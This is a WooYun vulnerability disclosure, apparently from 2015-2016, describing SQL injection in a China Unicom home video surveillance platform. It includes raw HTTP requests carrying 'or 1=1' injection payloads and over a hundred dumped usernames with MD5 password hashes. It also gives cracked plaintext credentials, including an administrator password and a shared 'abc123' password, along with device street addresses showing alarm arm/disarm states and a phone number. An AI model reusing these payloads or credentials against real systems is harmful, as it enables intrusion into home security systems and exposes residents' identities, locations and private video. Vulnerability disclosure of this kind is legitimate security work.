当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166435

漏洞标题:某联通手机看家视频监控系统多处SQL注入漏洞引发全站用户沦陷(大量用户隐私视频泄漏+姓名+身份证+住址+电话+监控地点)

相关厂商:某联通看家视频监控系统

漏洞作者: 0x 80

提交时间:2015-12-31 18:06

修复时间:2016-02-20 15:48

公开时间:2016-02-20 15:48

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2016-01-07: 厂商已经确认,细节仅向厂商公开
2016-01-17: 细节向核心白帽子及相关领域专家公开
2016-01-27: 细节向普通白帽子公开
2016-02-06: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

某联通手机看家视频监控系统多处SQL注入漏洞引发全站用户沦陷(大量用户隐私视频泄漏+姓名+身份证+住址+电话+监控地点)

详细说明:

http://**.**.**.**/
存在注入的二处

POST /index.php/welcome/login HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Content-Length: 60
Cookie: PHPSESSID=fae8e5723e99b66764b9099acf195241; __utma=261351769.841834454.1451541340.1451541340.1451541340.1; __utmb=261351**.**.**.**1541340; __utmc=261351769; __utmz=261351769.1451541340.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1; user_sess1=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22ac8969d8226ef1fd22fc5b3eee310787%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22**.**.**.**%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%3B+rv%3A43.0%29+Gecko%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221451540132%22%3B%7D72d5e97c28aa1fdbff57bc412bb6ba18
Connection: keep-alive
username=root'+or+1%3D1&password=root'+or+1%3D1&check_v=3627


POST /reg.php/active/bind_check HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/reg.php/active/step2
Content-Length: 41
Cookie: PHPSESSID=fae8e5723e99b66764b9099acf195241; __utma=261351769.841834454.1451541340.1451541340.1451541340.1; __utmb=261351**.**.**.**1541340; __utmc=261351769; __utmz=261351769.1451541340.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; user_sess1=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22ac8969d8226ef1fd22fc5b3eee310787%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22**.**.**.**%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%3B+rv%3A43.0%29+Gecko%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221451540132%22%3B%7D72d5e97c28aa1fdbff57bc412bb6ba18; reg_sess1=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2250b7b94f0666503154cd5ba2a7ef5787%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22**.**.**.**%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%3B+rv%3A43.0%29+Gecko%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221451540591%22%3Bs%3A5%3A%22devid%22%3Bs%3A5%3A%2211509%22%3B%7D2b428bd83fdf97b4bead26ef35d9acc9
Connection: keep-alive

捕获999.PNG


devid=11509&mobile=15882008953


以/reg.php/active/bind_check为例
注入

捕获99999.PNG


数据库重要的在ehome ehome2
我们就来找ehome2的用户数据

<code>----------------------------------+-------------+
passwd | username |
----------------------------------+-------------+
3fb2389e0e156b63d97272834132843c | sy_10675 |
98dae0e08c01f9e64dc3f9650eb5a714 | sy_10218 |
39375e8559373aede34f6f15b8dab4dc | sy_10892 |
99701e768d9a09b314e43a1d9e3e9dfa | sy_10665 |
3de73a3f80d7deaf2c7b77c7f8874044 | sy_10961 |
73dd2e5d59ee0b29b52058d4393b170f | sy_10270 |
28141c5d643609aa9279d7647d706018 | sy_10915 |
dbafb94acd0f5bb51afb63a64a03bf2f | sy_10292 |
67388f1834f7d6243b753ec33584a8df | sy_10422 |
e99a18c428cb38d5f260853678922e03 | sy_00010316 |
b4337d69a5afc0c2ff74d7c95065edf3 | sy_10903 |
40210a8b585beb1df047a786b7516bb9 | sy_11450 |
d787f83a93f12eb56db58c1268f944e0 | sy_10811 |
e99a18c428cb38d5f260853678922e03 | sy_00010938 |
e99a18c428cb38d5f260853678922e03 | sy_00010823 |
9bafa6744f936f58e710c819796c9d4b | sy_10917 |
e99a18c428cb38d5f260853678922e03 | sy_00010446 |
eb76370dc310e4cf08aa362593c451a1 | sy_10827 |
e99a18c428cb38d5f260853678922e03 | sy_10887 |
e99a18c428cb38d5f260853678922e03 | sy_10761 |
e99a18c428cb38d5f260853678922e03 | sy_11773 |
96c2d18f2983dd38165b91f60d22c993 | sy_10645 |
178930ab96f41d43179e4d2d1a3a16e7 | sy_11239 |
92fa75ef66b63628b547128bb87d823e | sy_10676 |
a1be4077177a0994db6713753e31a3b0 | sy_10226 |
e99a18c428cb38d5f260853678922e03 | sy_10220 |
e99a18c428cb38d5f260853678922e03 | sy_10674 |
ffe4a40fecc90fa1120088e704712fb2 | sy_10678 |
f52166cd701447355be87cbf41d31ca4 | sy_10357 |
3c2e55b31641e3d4cfd7867dd501c5d9 | dl_10849 |
115c51eb37365df2d4f4e2482b964822 | sy_10211 |
4b5deb9a14d66ab0acc3b8a2360cde7c | sy_10673 |
9acf1b76f369030270de8f98f84d6707 | sy_10319 |
a91e54caf4ae7dcf7a1f13640fa21079 | sy_10888 |
e99a18c428cb38d5f260853678922e03 | sy_00011308 |
e99a18c428cb38d5f260853678922e03 | sy_10372 |
e99a18c428cb38d5f260853678922e03 | sy_10016 |
e99a18c428cb38d5f260853678922e03 | sy_00010001 |
e99a18c428cb38d5f260853678922e03 | sy_10622 |
e99a18c428cb38d5f260853678922e03 | sy_10880 |
e99a18c428cb38d5f260853678922e03 | sy_10274 |
e99a18c428cb38d5f260853678922e03 | sy_10727 |
b70b5bd27190cb05443de664f418c858 | sjz_11317 |
e99a18c428cb38d5f260853678922e03 | ly_10979 |
e99a18c428cb38d5f260853678922e03 | ly_10476 |
e99a18c428cb38d5f260853678922e03 | ly_10573 |
e99a18c428cb38d5f260853678922e03 | ly_10277 |
e99a18c428cb38d5f260853678922e03 | sy_10913 |
e99a18c428cb38d5f260853678922e03 | sy_00011300 |
e99a18c428cb38d5f260853678922e03 | sy_00011309 |
e99a18c428cb38d5f260853678922e03 | sy_11290 |
75c6b2d6319e12f37ff421834ad22fa8 | sy_10604 |
d41d8cd98f00b204e9800998ecf8427e | sy_10449 |
b32d54edfbef54504db682d7d6d5be8d | sy_11303 |
e99a18c428cb38d5f260853678922e03 | sy_10901 |
e99a18c428cb38d5f260853678922e03 | sy_00010652 |
e99a18c428cb38d5f260853678922e03 | sy_00010617 |
58d123e75dac4f3e9fb6c4d20ca6f517 | sy_11285 |
e99a18c428cb38d5f260853678922e03 | sy_11294 |
e99a18c428cb38d5f260853678922e03 | sy_11307 |
e99a18c428cb38d5f260853678922e03 | sy_11283 |
e99a18c428cb38d5f260853678922e03 | sy_11295 |
e99a18c428cb38d5f260853678922e03 | sy_11319 |
a4243195cfd5fff0ca0ff45337d81344 | sy_11287 |
e99a18c428cb38d5f260853678922e03 | sy_11314 |
e99a18c428cb38d5f260853678922e03 | sy_11286 |
c370416bd42d48c75ceeba04434460f2 | sy_10654 |
52fd7b631fe5f72a0e67e0a01a915cff | sy_10046 |
e11cff89a4901f9591282a9cb73b7139 | lauda |
a8621fdfb85b64f3214f86af1e1504a2 | sy_10462 |
5631e6ee59a4175cd06c305840562ff3 | sy_10670 |
ca27f85469b7aeba193ee8a51cd8bbc0 | bj_12015 |
b17fe0912cce14904e1f893df0f1ff2e | bj_12005 |
dac4a67bdc4a800113b0f1ad67ed696f | sy_10817 |
7dca71e1fc625faee6151c296021df29 | fs_10384 |
5fe8fdc79ce292c39c5f209d734b7206 | sy_10299 |
ffa62ed6b346a531ee4dfb738cefe38f | 11776 |
0a5052334511e344f15ae0bfafd47a67 | 10404 |
447d5c2ba3e790ec434c0bee994095ed | 10408 |
983c25c7ee9644953077c7f3cb15a8db | 10842 |
2d1778a93cad78588bb5a0e30f6bc69b | bj_11764 |
183f50a7700982a3ed18ff6d7a5777bf | sy_10250 |
c41f9d71f3add2c27c41be3ed0baf7de | dl_11491 |
d41d8cd98f00b204e9800998ecf8427e | bj_12010 |
ee9a659033fad71ac37910e17d43ed7b | sy_1988 |
25c26f55e03df462afb61bc4cfabddf7 | hld_1317 |
722b98616d2f67c713e38976b72cfb56 | sy_1322 |
60349a2c965aec11e4a91ebb7f88bd1a | sy_1340 |
aa0cdac78656802dbfd8c2526faf38ec | sy_1985 |
e4ae083bc39ff59bb1d52f258087c14e | sy_1986 |
1a20b9cfb8e9aa3faf7894ebcd3fb2da | sy_10867 |
e10adc3949ba59abbe56e057f20f883e | sy_10051 |
7cb9dacee6de14000dc8ad8822a7ebd4 | fengw |
4acc3c3d00cc970a0c68f122c66a9b74 | hld_1326 |
c3fe9784abf607f0b6371ea85df357ba | sy_1010 |
3a29b590993a23322510a3cb74d12553 | sy_10388 |
f49d7365700109953cd136d6724e0d04 | sy_10866 |
d17981123640db315375c7e6ec42daab | fengzj |
0120dd0873e1dc5fb6ce07926be03414 | bj_10788 |
f9665b31fa132babac87dd48696ecdff | bj_11514 |
b0160876f84f59a4031d78f36b3cc9c3 | bj_11762 |
4bf9cd0c47aeb311049c6f5bafd85269 | sy_10653 |
2e667fca5e24ac13dcee94ddc4aa751a | sy_10309 |
5470abe68052c72afb19be45bb418d02 | sy_10672 |
ada71870b639ce542d6541ea178e4f25 | sy_10660 |
97e49161287e7a4f9b745366e4f9431b | sy_10836 |
c6c83f52f12dd1a8c33563e9a04126f6 | root |
c1399f2eb50e562b9e0f3778c16fd7a3 | sy_12009 |
f571b230f35658c8bd8c6348021e0b53 | sy_10998 |
ca5fbbbddd0c0ff6c01f782c60c9d1b5 | sy_10297 |
e99a18c428cb38d5f260853678922e03 | sy_10350 |
8fda1c0ac1c7cc0bcd217e1ec197cb81 | sy_10225 |
a952ddeda0b7e2c20744e52e728e5594 | sy_10230 |
32609807394d8cca2b23a6d9a75ccedd | sy_10668 |
ebbb5aae88b6c5b1bdd7e71bb9345132 | sy_10644 |
4cd31d31e16ac873f5f421d5880e88d6 | sy_10804 |
39d3ea44beb4c0cf78bde4e16e98ac28 | sy_10638 |
30b4a92517ace5825f5944c8a794ad3e | yk_11782 |
ee7ab148404f007a16be449f5565b7d7 | bj_12012 |
d97a9b4ada45b367805360f64d2c586c | bj_10782 |
f349f811e1aba3a97567bc3f1d2f50ab | bj_1765 |
959320be405da06994ec1e37c5f64aba | bj_10785 |
e99a18c428cb38d5f260853678922e03 | sy_10369 |
18a36c26cda317d1b2e469cb37dedffa | bj_11507 |
e10adc3949ba59abbe56e057f20f883e | bj_11517 |
b032d3b8526d4fbe37a52ddbc5b025d6 | bj_10846 |
9a86ef2ad5ad9415be8264aad4864e6b | bj_10848 |
443be2b31cb6f940bc5898134748508c | bj_1191 |
0e00d1f5f5ac7e213a383a03fafe9cfc | bj_1715 |
6a23beee138b72079dc502cfba8a2faa | bj_12001 |
17573b4fb556de9f0765d34fc60b3d80 | bj_11888 |
5eb5e1e9d800516ac581bcec3e2da16a | bj_12013 |
2db3545a41db81329326dbb11caff449 | sy00010472 |
----------------------------------+-------------+

</code>
全部泄漏
MD5直接可解
管理员后台的密码也破了
http://**.**.**.** 用户登录口
http://**.**.**.**/admin.php 管理员登录口

捕获98981.PNG


+-----------------+----------------------------------+--------------+
| ip | passwd | username |
+-----------------+----------------------------------+--------------+
| **.**.**.** | 353e2d4e5962bf6f2908bfd25ca79ea0 | xyx0417 |
| **.**.**.** | 29b01407dc293ddb6070dd1a31b8c414 | syhp |
| **.**.**.** | a47f035f86c53347dccd33196319916c | lihao |
| **.**.**.** | b9ecd8ece4a2a966b5451effd0a63380 | hldadmin |
| **.**.**.** | c2d0f889bc3af21f67973c7c4830eef5 | faudio |
| **.**.**.** | 57962961a4ab21b6d1c8f3d91f169067 | syhg |
| **.**.**.** | ded39317268750f15873d0af129efcf9 | root |
| **.**.**.** | e93059a7bbcc843da7901d59ccb0510b | supermanager |
| **.**.**.** | 2c46a2232bca26af9b5edd992151eab7 | chi_admin |
| **.**.**.** | 24fb732a56254dc7a7714ac748f86fdb | syadmin |
| **.**.**.** | 150c146417568ed7afc1589e6d371061 | sydd |
| **.**.**.** | cff4efba14ce013d8c55c5fbf3f9a7e9 | sysh |
| **.**.**.** | b0622841742f73dafae99515ff91d542 | gaolz |
+-----------------+----------------------------------+--------------+


管理员密码为root Jun8211

捕获91911.PNG


捕获987.PNG


大量用户身份证信息泄漏

捕获100.PNG


捕获101.PNG


捕获999991.PNG


10645	名流印象	在线		遥控器撤防	2015-12-31 03:03:24 PM	--
10226 浑南区金水花城 在线 遥控器撤防 2015-12-31 03:02:51 PM --
10676 铁西区北2中路21-2号 在线 布防 2015-12-31 03:02:50 PM --
10357 青年大街 在线 布防 2015-12-31 03:02:35 PM --
11290 辽河大街177号 在线 布防 2015-12-31 03:02:32 PM --
11287 东大营街31号127栋132室 在线 遥控器撤防 2015-12-31 03:02:32 PM --
10476 灯塔市古城街道古城村 在线 布防 2015-12-31 03:02:29 PM --
10211 铁西区571机房 在线 2015-12-31 03:02:21 PM --
1008000 1008000 在线 门磁 布防 2015-12-31 03:02:16 PM --
10622 于洪区高花营业厅 在线 网页撤防 2015-12-31 03:02:15 PM --


设备ID 	设备地址 	在线状态 	报警状态 	布防状态 	更新时间 	操作
10622 于洪区高花营业厅 在线 网页撤防 2015-12-31 03:02:15 PM --
10350 营口联通营业厅 在线 网页撤防 2015-12-31 03:02:09 PM --
10297 于洪光浑农场“丰源”农资店 在线 布防 2015-12-31 03:02:06 PM --
182 肖家营 在线 布防 2015-12-31 03:01:58 PM --
10001 沈阳市沈河区铁岭路116号5-3-2 在线 紧急援助 遥控器撤防 2015-12-31 03:01:22 PM --
12005 沈阳市联通中山局 在线 布防 2015-12-31 03:00:55 PM --
10225 于洪区青山路56-2号1-5-2 在线 2015-12-31 03:00:51 PM --
10028 苏家屯区南京南街1188号 在线 布防 2015-12-31 03:00:49 PM --
10727 于洪区中朝营业厅 在线 布防 2015-12-31 03:00:31 PM --
10961 联通测试 在线 布防 2015-12-31 03:00:23 PM --


设备ID 	设备地址 	在线状态 	报警状态 	布防状态 	更新时间 	操作
10836 沈阳联通行业应用展示厅 离线 紧急报警 遥控器撤防 2015-12-24 04:01:48 PM --
99800 99800 离线 水浸 网页布防 2015-12-22 11:15:11 AM --
11307 辽中县迎宾路71号 离线 布防 2015-12-14 09:19:51 AM --
10674 沈阳八经街4号 离线 布防 2015-11-28 09:51:01 AM --
11319 辽中县大黑镇营城村 离线 布防 2015-10-29 07:09:08 PM --
10277 灯塔市烟台街道 离线 紧急援助 遥控器撤防 2015-10-27 07:46:39 AM --
12345678 12345678 离线 紧急援助 遥控器撤防 2015-10-26 01:46:22 PM --
10901 市场部 离线 窗磁 遥控器布防 2015-10-25 11:17:43 AM --
10979 灯塔市古城街道农产品监管站 离线 布防 2015-10-13 01:45:57 PM --
1336 1336 离线 布防 2015-09-25 09:36:39 PM --


管理员名 	身份 	城市 	上次登录时间 	上次登录IP 	操作
chi_admin 地区管理员 沈阳 2011-01-13 16:35:00 **.**.**.** 删除 修改
gaolz 地区管理员 沈阳 2015-12-16 11:33:39 **.**.**.** 删除 修改
hldadmin 地区管理员 葫芦岛 2010-06-22 15:55:42 **.**.**.** 删除 修改
syadmin 地区管理员 沈阳 2011-03-02 09:22:34 **.**.**.** 删除 修改


管理员名 	身份 	城市 	上次登录时间 	上次登录IP 	操作
sydd 操作员 沈阳大东区 2011-03-02 09:24:37 **.**.**.** 删除 修改
syhg 操作员 沈阳皇姑区 2010-04-22 17:35:59 **.**.**.** 删除 修改
syhp 操作员 沈阳和平区 2010-06-26 12:18:21 **.**.**.** 删除 修改
sysh 操作员 沈阳沈河区 2014-06-25 17:53:39 **.**.**.** 删除 修改
xyx0417 操作员 营口 2013-05-30 13:18:03 **.**.**.** 删除 修改


http://**.**.**.**/
来到用户登录口
随便登录一个用户yk_11782 11782

捕获9198.PNG


捕获981.PNG


捕获87.PNG


d17981123640db315375c7e6ec42daab | fengzj
fengzj 196577

捕获verPNG.PNG


捕获9991991.PNG


捕获ha.PNG


捕获91.PNG


fengw fengw

e99a18c428cb38d5f260853678922e03 | sy_00011308 |
e99a18c428cb38d5f260853678922e03 | sy_10372 |
e99a18c428cb38d5f260853678922e03 | sy_10016 |
e99a18c428cb38d5f260853678922e03 | sy_00010001 |
e99a18c428cb38d5f260853678922e03 | sy_10622 |
e99a18c428cb38d5f260853678922e03 | sy_10880 |
e99a18c428cb38d5f260853678922e03 | sy_10274 |
e99a18c428cb38d5f260853678922e03 | sy_10727 |
b70b5bd27190cb05443de664f418c858 | sjz_11317 |
e99a18c428cb38d5f260853678922e03 | ly_10979 |
e99a18c428cb38d5f260853678922e03 | ly_10476 |
e99a18c428cb38d5f260853678922e03 | ly_10573 |
e99a18c428cb38d5f260853678922e03 | ly_10277 |
e99a18c428cb38d5f260853678922e03 | sy_10913 |
e99a18c428cb38d5f260853678922e03 | sy_00011300 |
e99a18c428cb38d5f260853678922e03 | sy_00011309 |
e99a18c428cb38d5f260853678922e03 | sy_11290 |


密码都是abc123
yk_11782 11782

捕获9b.PNG


漏洞证明:

http://**.**.**.**/

http://**.**.**.**/admin.php


捕获919b.PNG

修复方案:

版权声明:转载请注明来源 0x 80@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-07 15:24

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-01 21:29 | 这只猪 ( 路人 | Rank:24 漏洞数:6 | )(2009年荣获CCAV首届挖洞大使称号)(★★★...)

    这就是实名制的不好处…

  2. 2016-01-02 12:40 | 0x 80 ( 普通白帽子 | Rank:1559 漏洞数:449 | 某安全公司招聘渗透测试工程师,具备3-5年...)

    肯定啊,···········

  3. 2016-01-07 22:22 | von ( 路人 | Rank:2 漏洞数:1 | 一个帅字贯穿了我的一生~)

    实名制可以,但是厂商怎么保证个人隐私的安全啊= =